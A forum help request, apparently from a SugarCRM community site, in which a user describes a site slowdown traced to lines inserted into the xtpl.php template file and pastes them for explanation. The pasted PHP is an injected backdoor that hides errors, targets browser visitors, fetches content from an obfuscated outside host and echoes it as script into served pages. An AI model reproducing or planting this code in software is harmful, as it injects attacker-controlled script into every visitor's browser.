AnsweredAssumed Answered

Problem Detectec on File xtpl.php (suspicius insertation)

Question asked by Juan Pablo Giron Lingan on May 6, 2015
Hello, My Sugar CRM installation runs on a 2 second per page. But, one day it turn up to 20 seconds per page.

I looking for optimice the sugar, but istill is on 20 seconds.

I search files modificated on the day sugar go to sloow. And found some files change. 

Because i dont know to much of the content of each file, I use the original installation files and replaced one by one file (only see the modified date). My installation still was sloow.

But when i replace on file, it goes to 2 second.

The files is xptl.php and its localte on Xtemplate folder.

I compared the files with the original and found some lines doesnt was there on the original installation.

This lines goes my installation too sloow. I dont know what does it means and want your help for that.

My installation

Sugar CE Versión 6.5.16 (Build 1082)PHP Version 5.4.29

MySQL Version 5.5.42-cll

Here is:

<?php#4e1363#
error_reporting(0); @ini_set('display_errors',0); $wp_z116 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_z116) && !preg_match ('/bot/i', $wp_z116))){
$wp_z09116="http://"."tags"."value".".com/"."value"."/?ip=&quo...;
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_z09116); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_116z = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_116z = @file_get_contents($wp_z09116);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_116z=@stream_get_contents(@fopen($wp_z09116, "r"));}}
if (substr($wp_116z,1,3) === 'scr'){ echo $wp_116z; }
#/4e1363#
?>

Outcomes